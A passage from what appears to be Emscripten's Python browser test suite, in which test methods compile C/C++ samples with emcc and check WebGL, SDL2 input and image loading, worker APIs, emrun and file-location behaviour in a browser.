print('mem init, so async, call too early')
open(os.path.join(self.get_dir(), 'post.js'), 'w').write(post_prep + post_test + post_hook)
self.btest(filename, expected='600', args=['--post-js', 'post.js', '--memory-init-file', '1', '-s', 'NO_EXIT_RUNTIME=0'] + extra_args + mode)
print('sync startup, call too late')
open(os.path.join(self.get_dir(), 'post.js'), 'w').write(post_prep + 'Module.postRun.push(function() { ' + post_test + ' });' + post_hook);
self.btest(filename, expected=str(second_code), args=['--post-js', 'post.js', '--memory-init-file', '0', '-s', 'NO_EXIT_RUNTIME=0'] + extra_args + mode)
print('sync, runtime still alive, so all good')
open(os.path.join(self.get_dir(), 'post.js'), 'w').write(post_prep + 'expected_ok = true; Module.postRun.push(function() { ' + post_test + ' });' + post_hook);
self.btest(filename, expected='606', args=['--post-js', 'post.js', '--memory-init-file', '0'] + extra_args + mode)
def test_cwrap_early(self):
self.btest(os.path.join('browser', 'cwrap_early.cpp'), args=['-O2', '-s', 'ASSERTIONS=1', '--pre-js', path_from_root('tests', 'browser', 'cwrap_early.js'), '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=["cwrap"]'], expected='0')
def test_worker_api(self):
Popen([PYTHON, EMCC, path_from_root('tests', 'worker_api_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-s', 'EXPORTED_FUNCTIONS=["_one"]']).communicate()
self.btest('worker_api_main.cpp', expected='566')
def test_worker_api_2(self):
run_process([PYTHON, EMCC, path_from_root('tests', 'worker_api_2_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-O2', '--minify', '0', '-s', 'EXPORTED_FUNCTIONS=["_one", "_two", "_three", "_four"]', '--closure', '1'])
self.btest('worker_api_2_main.cpp', args=['-O2', '--minify', '0'], expected='11')
def test_worker_api_3(self):
Popen([PYTHON, EMCC, path_from_root('tests', 'worker_api_3_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-s', 'EXPORTED_FUNCTIONS=["_one"]']).communicate()
self.btest('worker_api_3_main.cpp', expected='5')
def test_worker_api_sleep(self):
Popen([PYTHON, EMCC, path_from_root('tests', 'worker_api_worker_sleep.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-s', 'EXPORTED_FUNCTIONS=["_one"]', '-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1']).communicate()
self.btest('worker_api_main.cpp', expected='566')
def test_emscripten_async_wget2(self):
self.btest('http.cpp', expected='0', args=['-I' + path_from_root('tests')])
# TODO: test only worked in non-fastcomp
@unittest.skip('non-fastcomp is deprecated and fails in 3.5')
def test_module(self):
Popen([PYTHON, EMCC, path_from_root('tests', 'browser_module.cpp'), '-o', 'module.js', '-O2', '-s', 'SIDE_MODULE=1', '-s', 'DLOPEN_SUPPORT=1', '-s', 'EXPORTED_FUNCTIONS=["_one", "_two"]']).communicate()
self.btest('browser_main.cpp', args=['-O2', '-s', 'MAIN_MODULE=1', '-s', 'DLOPEN_SUPPORT=1'], expected='8')
def test_mmap_file(self):
open(self.in_dir('data.dat'), 'w').write('data from the file ' + ('.' * 9000))
for extra_args in [[], ['--no-heap-copy']]:
self.btest(path_from_root('tests', 'mmap_file.c'), expected='1', args=['--preload-file', 'data.dat'] + extra_args)
def test_emrun_info(self):
if not has_browser(): self.skipTest('need a browser')
result = run_process([PYTHON, path_from_root('emrun'), '--system_info', '--browser_info'], stdout=PIPE).stdout
assert 'CPU' in result
assert 'Browser' in result
assert 'Traceback' not in result
result = run_process([PYTHON, path_from_root('emrun'), '--list_browsers'], stdout=PIPE).stdout
assert 'Traceback' not in result
# Deliberately named as test_zzz_emrun to make this test the last one
# as this test may take the focus away from the main test window
# by opening a new window and possibly not closing it.
def test_zzz_emrun(self):
if not has_browser(): self.skipTest('need a browser')
Popen([PYTHON, EMCC, path_from_root('tests', 'test_emrun.c'), '--emrun', '-o', 'hello_world.html']).communicate()
outdir = os.getcwd()
# We cannot run emrun from the temp directory the suite will clean up afterwards, since the browser that is launched will have that directory as startup directory,
# and the browser will not close as part of the test, pinning down the cwd on Windows and it wouldn't be possible to delete it. Therefore switch away from that directory
# before launching.
os.chdir(path_from_root())
args = [PYTHON, path_from_root('emrun'), '--timeout', '30', '--safe_firefox_profile', '--port', '6939', '--verbose', '--log_stdout', os.path.join(outdir, 'stdout.txt'), '--log_stderr', os.path.join(outdir, 'stderr.txt')]
browser = get_browser()
if browser is not None:
# If EMSCRIPTEN_BROWSER carried command line arguments to pass to the browser, (e.g. "firefox -profile /path/to/foo") those can't be passed via emrun, so strip them out.
browser_cmd = shlex.split(browser)
browser_path = browser_cmd[0]
args += ['--browser', browser_path]
if len(browser_cmd) > 1:
browser_args = browser_cmd[1:]
if 'firefox' in browser_path and '-profile' in browser_args:
# emrun uses its own -profile, strip it out
import argparse
parser = argparse.ArgumentParser(add_help=False) # otherwise it throws with -headless
parser.add_argument('-profile')
browser_args = parser.parse_known_args(browser_args)[1]
if browser_args:
args += ['--browser_args', ' ' + ' '.join(browser_args)]
args += [os.path.join(outdir, 'hello_world.html'), '1', '2', '--3']
process = subprocess.Popen(args)
process.communicate()
stdout = open(os.path.join(outdir, 'stdout.txt'), 'r').read()
stderr = open(os.path.join(outdir, 'stderr.txt'), 'r').read()
assert process.returncode == 100
assert 'argc: 4' in stdout
assert 'argv[3]: --3' in stdout
assert 'hello, world!' in stdout
assert 'Testing ASCII characters: !"$%&\'()*+,-./:;<=>?@[\\]^_`{|}~' in stdout
assert 'Testing char sequences: %20%21 ä' in stdout
assert 'hello, error stream!' in stderr
# This does not actually verify anything except that --cpuprofiler and --memoryprofiler compiles.
# Run interactive.test_cpuprofiler_memoryprofiler for interactive testing.
@requires_hardware
def test_cpuprofiler_memoryprofiler(self):
self.btest('hello_world_gles.c', expected='0', args=['-DLONGTEST=1', '-DTEST_MEMORYPROFILER_ALLOCATIONS_MAP=1', '-O2', '--cpuprofiler', '--memoryprofiler', '-lGL', '-lglut'], timeout=30)
def test_uuid(self):
# Run with ./runner.py browser.test_uuid
# We run this test in Node/SPIDERMONKEY and browser environments because we try to make use of
# high quality crypto random number generators such as crypto.getRandomValues or randomBytes (if available).
# First run tests in Node and/or SPIDERMONKEY using run_js. Use closure compiler so we can check that
# require('crypto').randomBytes and window.crypto.getRandomValues doesn't get minified out.
Popen([PYTHON, EMCC, '-O2', '--closure', '1', path_from_root('tests', 'uuid', 'test.c'), '-o', 'test.js', '-luuid'], stdout=PIPE, stderr=PIPE).communicate()
test_js_closure = open('test.js').read()
# Check that test.js compiled with --closure 1 contains ").randomBytes" and "window.crypto.getRandomValues"
assert ").randomBytes" in test_js_closure
assert "window.crypto.getRandomValues" in test_js_closure
out = run_js('test.js', full_output=True)
print(out)
# Tidy up files that might have been created by this test.
try_delete(path_from_root('tests', 'uuid', 'test.js'))
try_delete(path_from_root('tests', 'uuid', 'test.js.map'))
# Now run test in browser
self.btest(path_from_root('tests', 'uuid', 'test.c'), '1', args=['-luuid'])
@requires_hardware
def test_glew(self):
self.btest(path_from_root('tests', 'glew.c'), args=['-lGL', '-lSDL', '-lGLEW'], expected='1')
self.btest(path_from_root('tests', 'glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-s', 'LEGACY_GL_EMULATION=1'], expected='1')
self.btest(path_from_root('tests', 'glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-DGLEW_MX'], expected='1')
self.btest(path_from_root('tests', 'glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-s', 'LEGACY_GL_EMULATION=1', '-DGLEW_MX'], expected='1')
def test_doublestart_bug(self):
open('pre.js', 'w').write(r'''
if (!Module['preRun']) Module['preRun'] = [];
Module["preRun"].push(function () {
addRunDependency('test_run_dependency');
removeRunDependency('test_run_dependency');
});
''')
self.btest('doublestart.c', args=['--pre-js', 'pre.js', '-o', 'test.html'], expected='1')
def test_html5(self):
for opts in [[], ['-O2', '-g1', '--closure', '1']]:
print(opts)
self.btest(path_from_root('tests', 'test_html5.c'), args=opts, expected='0', timeout=20)
@requires_hardware
def test_html5_webgl_create_context(self):
for opts in [[], ['-O2', '-g1', '--closure', '1'], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(path_from_root('tests', 'webgl_create_context.cpp'), args=opts + ['-lGL'], expected='0', timeout=20)
@requires_hardware
# Verify bug https://github.com/kripken/emscripten/issues/4556: creating a WebGL context to Module.canvas without an ID explicitly assigned to it.
def test_html5_webgl_create_context2(self):
self.btest(path_from_root('tests', 'webgl_create_context2.cpp'), args=['--shell-file', path_from_root('tests', 'webgl_create_context2_shell.html'), '-lGL'], expected='0', timeout=20)
@requires_hardware
def test_html5_webgl_destroy_context(self):
for opts in [[], ['-O2', '-g1'], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(path_from_root('tests', 'webgl_destroy_context.cpp'), args=opts + ['--shell-file', path_from_root('tests/webgl_destroy_context_shell.html'), '-lGL'], expected='0', timeout=20)
@requires_hardware
def test_webgl_context_params(self):
if WINDOWS: self.skipTest('SKIPPED due to bug https://bugzilla.mozilla.org/show_bug.cgi?id=1310005 - WebGL implementation advertises implementation defined GL_IMPLEMENTATION_COLOR_READ_TYPE/FORMAT pair that it cannot read with')
self.btest(path_from_root('tests', 'webgl_color_buffer_readpixels.cpp'), args=['-lGL'], expected='0', timeout=20)
# Test for PR#5373 (https://github.com/kripken/emscripten/pull/5373)
def test_webgl_shader_source_length(self):
for opts in [[], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(path_from_root('tests', 'webgl_shader_source_length.cpp'), args=opts + ['-lGL'], expected='0', timeout=20)
def test_webgl2(self):
for opts in [[], ['-O2', '-g1', '--closure', '1'], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(path_from_root('tests', 'webgl2.cpp'), args=['-s', 'USE_WEBGL2=1', '-lGL'] + opts, expected='0')
def test_webgl2_objects(self):
self.btest(path_from_root('tests', 'webgl2_objects.cpp'), args=['-s', 'USE_WEBGL2=1', '-lGL'], expected='0')
def test_webgl2_ubos(self):
self.btest(path_from_root('tests', 'webgl2_ubos.cpp'), args=['-s', 'USE_WEBGL2=1', '-lGL'], expected='0')
@requires_hardware
def test_webgl2_garbage_free_entrypoints(self):
self.btest(path_from_root('tests', 'webgl2_garbage_free_entrypoints.cpp'), args=['-s', 'USE_WEBGL2=1', '-DTEST_WEBGL2=1'], expected='1')
self.btest(path_from_root('tests', 'webgl2_garbage_free_entrypoints.cpp'), expected='1')
@requires_hardware
def test_webgl2_backwards_compatibility_emulation(self):
self.btest(path_from_root('tests', 'webgl2_backwards_compatibility_emulation.cpp'), args=['-s', 'USE_WEBGL2=1', '-s', 'WEBGL2_BACKWARDS_COMPATIBILITY_EMULATION=1'], expected='0')
@requires_hardware
def test_webgl_with_closure(self):
self.btest(path_from_root('tests', 'webgl_with_closure.cpp'), args=['-O2', '-s', 'USE_WEBGL2=1', '--closure', '1', '-lGL'], expected='0')
def test_sdl_touch(self):
for opts in [[], ['-O2', '-g1', '--closure', '1']]:
print(opts)
self.btest(path_from_root('tests', 'sdl_touch.c'), args=opts + ['-DAUTOMATE_SUCCESS=1', '-lSDL', '-lGL'], expected='0')
def test_html5_mouse(self):
for opts in [[], ['-O2', '-g1', '--closure', '1']]:
print(opts)
self.btest(path_from_root('tests', 'test_html5_mouse.c'), args=opts + ['-DAUTOMATE_SUCCESS=1'], expected='0')
def test_sdl_mousewheel(self):
for opts in [[], ['-O2', '-g1', '--closure', '1']]:
print(opts)
self.btest(path_from_root('tests', 'test_sdl_mousewheel.c'), args=opts + ['-DAUTOMATE_SUCCESS=1', '-lSDL', '-lGL'], expected='0')
def test_codemods(self):
# tests asm.js client-side code modifications
for opt_level in [0, 2]:
print('opt level', opt_level)
opts = ['-O' + str(opt_level), '-s', 'WASM=0']
# sanity checks, building with and without precise float semantics generates different results
self.btest(path_from_root('tests', 'codemods.cpp'), expected='2', args=opts)
self.btest(path_from_root('tests', 'codemods.cpp'), expected='1', args=opts + ['-s', 'PRECISE_F32=1'])
self.btest(path_from_root('tests', 'codemods.cpp'), expected='1', args=opts + ['-s', 'PRECISE_F32=2', '--separate-asm']) # empty polyfill, but browser has support, so semantics are like float
def test_wget(self):
with open(os.path.join(self.get_dir(), 'test.txt'), 'w') as f:
f.write('emscripten')
self.btest(path_from_root('tests', 'test_wget.c'), expected='1', args=['-s', 'ASYNCIFY=1'])
print('asyncify+emterpreter')
self.btest(path_from_root('tests', 'test_wget.c'), expected='1', args=['-s', 'ASYNCIFY=1', '-s', 'EMTERPRETIFY=1'])
print('emterpreter by itself')
self.btest(path_from_root('tests', 'test_wget.c'), expected='1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1'])
def test_wget_data(self):
with open(os.path.join(self.get_dir(), 'test.txt'), 'w') as f:
f.write('emscripten')
self.btest(path_from_root('tests', 'test_wget_data.c'), expected='1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O2', '-g2'])
self.btest(path_from_root('tests', 'test_wget_data.c'), expected='1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O2', '-g2', '-s', 'ASSERTIONS=1'])
def test_locate_file(self):
for wasm in [0, 1]:
print('wasm', wasm)
self.clear()
open('src.cpp', 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <assert.h>
int main() {
FILE *f = fopen("data.txt", "r");
assert(f && "could not open file");
char buf[100];
int num = fread(buf, 1, 20, f);
assert(num == 20 && "could not read 20 bytes");
buf[20] = 0;
fclose(f);
int result = !strcmp("load me right before", buf);
printf("|%s| : %d\n", buf, result);
REPORT_RESULT(result);
return 0;
}
'''))
open('data.txt', 'w').write('load me right before...')
open('pre.js', 'w').write('Module.locateFile = function(x) { return "sub/" + x };')
Popen([PYTHON, FILE_PACKAGER, 'test.data', '--preload', 'data.txt'], stdout=open('data.js', 'w')).communicate()
# put pre.js first, then the file packager data, so locateFile is there for the file loading code
Popen([PYTHON, EMCC, 'src.cpp', '-O2', '-g', '--pre-js', 'pre.js', '--pre-js', 'data.js', '-o', 'page.html', '-s', 'FORCE_FILESYSTEM=1', '-s', 'WASM=' + str(wasm)]).communicate()
os.mkdir('sub')
if wasm:
shutil.move('page.wasm', os.path.join('sub', 'page.wasm'))
else:
shutil.move('page.html.mem', os.path.join('sub', 'page.html.mem'))
shutil.move('test.data', os.path.join('sub', 'test.data'))
self.run_browser('page.html', None, '/report_result?1')
# alternatively, put locateFile in the HTML
print('in html')
open('shell.html', 'w').write('''
<body>
<script>
var Module = {
locateFile: function(x) { return "sub/" + x }
};
</script>
{{{ SCRIPT }}}
</body>
''')
def in_html(expected, args=[]):
Popen([PYTHON, EMCC, 'src.cpp', '-O2', '-g', '--shell-file', 'shell.html', '--pre-js', 'data.js', '-o', 'page.html', '-s', 'SAFE_HEAP=1', '-s', 'ASSERTIONS=1', '-s', 'FORCE_FILESYSTEM=1', '-s', 'WASM=' + str(wasm)] + args).communicate()
if wasm:
shutil.move('page.wasm', os.path.join('sub', 'page.wasm'))
else:
shutil.move('page.html.mem', os.path.join('sub', 'page.html.mem'))
self.run_browser('page.html', None, '/report_result?' + expected)
in_html('1')
# verify that the mem init request succeeded in the latter case
if not wasm:
open('src.cpp', 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
int result = EM_ASM_INT({
return Module['memoryInitializerRequest'].status;
});
printf("memory init request: %d\n", result);
REPORT_RESULT(result);
return 0;
}
'''))
in_html('200')
@requires_hardware
def test_glfw3(self):
for opts in [[], ['-Os', '--closure', '1']]:
print(opts)
self.btest(path_from_root('tests', 'glfw3.c'), args=['-s', 'LEGACY_GL_EMULATION=1', '-s', 'USE_GLFW=3', '-lglfw', '-lGL'] + opts, expected='1')
@requires_hardware
def test_glfw_events(self):
self.btest(path_from_root('tests', 'glfw_events.c'), args=['-s', 'USE_GLFW=2', "-DUSE_GLFW=2", '-lglfw', '-lGL'], expected='1')
self.btest(path_from_root('tests', 'glfw_events.c'), args=['-s', 'USE_GLFW=3', "-DUSE_GLFW=3", '-lglfw', '-lGL'], expected='1')
def test_asm_swapping(self):
self.clear()
open('run.js', 'w').write(r'''
Module['onRuntimeInitialized'] = function() {
// test proper initial result
var result = Module._func();
console.log('first: ' + result);
if (result !== 10) throw 'bad first result';
// load second module to be swapped in
var second = document.createElement('script');
second.onload = function() { console.log('loaded second') };
second.src = 'second.js';
document.body.appendChild(second);
console.log('second appended');
Module['onAsmSwap'] = function() {
console.log('swapped');
// verify swapped-in result
var result = Module._func();
console.log('second: ' + result);
if (result !== 22) throw 'bad second result';
Module._report(999);
console.log('reported');
};
};
''')
for opts in [[], ['-O1'], ['-O2', '-profiling'], ['-O2']]:
print(opts)
opts += ['-s', 'WASM=0', '--pre-js', 'run.js', '-s', 'SWAPPABLE_ASM_MODULE=1'] # important that both modules are built with the same opts
open('second.cpp', 'w').write(self.with_report_result(open(path_from_root('tests', 'asm_swap2.cpp')).read()))
Popen([PYTHON, EMCC, 'second.cpp'] + opts).communicate()
Popen([PYTHON, path_from_root('tools', 'distill_asm.py'), 'a.out.js', 'second.js', 'swap-in']).communicate()
assert os.path.exists('second.js')
if isinstance(SPIDERMONKEY_ENGINE, list) and len(SPIDERMONKEY_ENGINE[0]) != 0:
out = run_js('second.js', engine=SPIDERMONKEY_ENGINE, stderr=PIPE, full_output=True, assert_returncode=None)
self.validate_asmjs(out)
else:
print('Skipping asm validation check, spidermonkey is not configured')
self.btest(path_from_root('tests', 'asm_swap.cpp'), args=opts, expected='999')
def test_sdl2_image(self):
# load an image file, get pixel data. Also O2 coverage for --preload-file, and memory-init
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.jpg'))
open(os.path.join(self.get_dir(), 'sdl2_image.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl2_image.c')).read()))
for mem in [0, 1]:
for dest, dirname, basename in [('screenshot.jpg', '/', 'screenshot.jpg'),
('screenshot.jpg@/assets/screenshot.jpg', '/assets', 'screenshot.jpg')]:
Popen([
PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl2_image.c'), '-o', 'page.html', '-O2', '--memory-init-file', str(mem),
'--preload-file', dest, '-DSCREENSHOT_DIRNAME="' + dirname + '"', '-DSCREENSHOT_BASENAME="' + basename + '"', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--use-preload-plugins'
]).communicate()
self.run_browser('page.html', '', '/report_result?600')
def test_sdl2_image_jpeg(self):
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.jpeg'))
open(os.path.join(self.get_dir(), 'sdl2_image_jpeg.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl2_image.c')).read()))
Popen([
PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl2_image_jpeg.c'), '-o', 'page.html',
'--preload-file', 'screenshot.jpeg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpeg"', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--use-preload-plugins'
]).communicate()
self.run_browser('page.html', '', '/report_result?600')
def test_sdl2_image_formats(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl2_image.c', expected='512', args=['--preload-file', 'screenshot.png', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.png"',
'-DNO_PRELOADED','-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '-s', 'SDL2_IMAGE_FORMATS=["png"]'])
def test_sdl2_key(self):
for defines in [[]]:
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function keydown(c) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keydown", true, true, window,
0, 0, 0, 0,
c, c);
var prevented = !document.dispatchEvent(event);
//send keypress if not prevented
if (!prevented) {
event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keypress", true, true, window,
0, 0, 0, 0, 0, c);
document.dispatchEvent(event);
}
}
function keyup(c) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keyup", true, true, window,
0, 0, 0, 0,
c, c);
document.dispatchEvent(event);
}
''')
open(os.path.join(self.get_dir(), 'sdl2_key.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl2_key.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl2_key.c'), '-o', 'page.html'] + defines + ['-s', 'USE_SDL=2','--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''']).communicate()
self.run_browser('page.html', '', '/report_result?37182145')
def test_sdl2_text(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function simulateKeyEvent(charCode) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keypress", true, true, window,
0, 0, 0, 0, 0, charCode);
document.body.dispatchEvent(event);
}
''')
open(os.path.join(self.get_dir(), 'sdl2_text.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl2_text.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl2_text.c'), '-o', 'page.html', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''', '-s', 'USE_SDL=2']).communicate()
self.run_browser('page.html', '', '/report_result?1')
def test_sdl2_mouse(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
open(os.path.join(self.get_dir(), 'sdl2_mouse.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl2_mouse.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl2_mouse.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-s', 'USE_SDL=2']).communicate()
self.run_browser('page.html', '', '/report_result?1', timeout=30)
def test_sdl2_mouse_offsets(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, x, y, x, y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
open(os.path.join(self.get_dir(), 'page.html'), 'w').write('''
<html>
<head>
<style type="text/css">
html, body { margin: 0; padding: 0; }
#container {
position: absolute;
left: 5px; right: 0;
top: 5px; bottom: 0;
}
#canvas {
position: absolute;
left: 0; width: 600px;
top: 0; height: 450px;
}
textarea {
margin-top: 500px;
margin-left: 5px;
width: 600px;
}
</style>
</head>
<body>
<div id="container">
<canvas id="canvas"></canvas>
</div>
<textarea id="output" rows="8"></textarea>
<script type="text/javascript">
var Module = {
canvas: document.getElementById('canvas'),
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
if (arguments.length > 1) text = Array.prototype.slice.call(arguments).join(' ');
element.value += text + "\\n";
element.scrollTop = element.scrollHeight; // focus on bottom
};
})()
};
</script>
<script type="text/javascript" src="sdl2_mouse.js"></script>
</body>
</html>
''')
open(os.path.join(self.get_dir(), 'sdl2_mouse.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl2_mouse.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl2_mouse.c'), '-DTEST_SDL_MOUSE_OFFSETS=1', '-O2', '--minify', '0', '-o', 'sdl2_mouse.js', '--pre-js', 'pre.js', '-s', 'USE_SDL=2']).communicate()
self.run_browser('page.html', '', '/report_result?1')
@requires_hardware
def test_sdl2glshader(self):
self.btest('sdl2glshader.c', reference='sdlglshader.png', args=['-s', 'USE_SDL=2', '-O2', '--closure', '1', '-s', 'LEGACY_GL_EMULATION=1'])
self.btest('sdl2glshader.c', reference='sdlglshader.png', args=['-s', 'USE_SDL=2', '-O2', '-s', 'LEGACY_GL_EMULATION=1'], also_proxied=True) # XXX closure fails on proxy
def test_sdl2_canvas_blank(self):
self.btest('sdl2_canvas_blank.c', reference='sdl_canvas_blank.png', args=['-s', 'USE_SDL=2'])
def test_sdl2_canvas_palette(self):
self.btest('sdl2_canvas_palette.c', reference='sdl_canvas_palette.png', args=['-s', 'USE_SDL=2'])
def test_sdl2_canvas_twice(self):
self.btest('sdl2_canvas_twice.c', reference='sdl_canvas_twice.png', args=['-s', 'USE_SDL=2'])
def zzztest_sdl2_gfx_primitives(self):
self.btest('sdl2_gfx_primitives.c', args=['-s', 'USE_SDL=2', '-lSDL2_gfx'], reference='sdl_gfx_primitives.png', reference_slack=1)
def test_sdl2_canvas_palette_2(self):
open(os.path.join(self.get_dir(), 'args-r.js'), 'w').write('''
Module['arguments'] = ['-r'];
''')
open(os.path.join(self.get_dir(), 'args-g.js'), 'w').write('''
Module['arguments'] = ['-g'];
''')
open(os.path.join(self.get_dir(), 'args-b.js'), 'w').write('''
Module['arguments'] = ['-b'];
''')
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_r.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-r.js'])
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_g.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-g.js'])
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_b.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-b.js'])
def test_sdl2_swsurface(self):
self.btest('sdl2_swsurface.c', expected='1', args=['-s', 'USE_SDL=2'])
def test_sdl2_image_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl2_image_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2'])
def test_sdl2_image_prepare_data(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl2_image_prepare_data.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2'])
@requires_hardware
def test_sdl2_canvas_proxy(self):
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function assert(x, y) { if (!x) throw 'assertion failed ' + y }
%s
var windowClose = window.close;
window.close = function() {
// wait for rafs to arrive and the screen to update before reftesting
setTimeout(function() {
doReftest();
setTimeout(windowClose, 5000);
}, 1000);
};
</script>
</body>''' % open('reftest.js').read())
open('test.html', 'w').write(html)
open('data.txt', 'w').write('datum')
self.btest('sdl2_canvas_proxy.c', reference='sdl2_canvas.png', args=['-s', 'USE_SDL=2', '--proxy-to-worker', '--preload-file', 'data.txt', '-s', 'GL_TESTING=1'], manual_reference=True, post_build=post)
def test_sdl2_pumpevents(self):
# key events should be detected using SDL_PumpEvents
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function keydown(c) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keydown", true, true, window,
0, 0, 0, 0,
c, c);
document.dispatchEvent(event);
}
''')
self.btest('sdl2_pumpevents.c', expected='7', args=['--pre-js', 'pre.js', '-s', 'USE_SDL=2'])
def test_sdl2_timer(self):
self.btest('sdl2_timer.c', expected='5', args=['-s', 'USE_SDL=2'])
def test_sdl2_canvas_size(self):
self.btest('sdl2_canvas_size.c', expected='1', args=['-s', 'USE_SDL=2'])
@requires_hardware
def test_sdl2_gl_read(self):
# SDL, OpenGL, readPixels
open(os.path.join(self.get_dir(), 'sdl2_gl_read.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl2_gl_read.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl2_gl_read.c'), '-o', 'something.html', '-s', 'USE_SDL=2']).communicate()
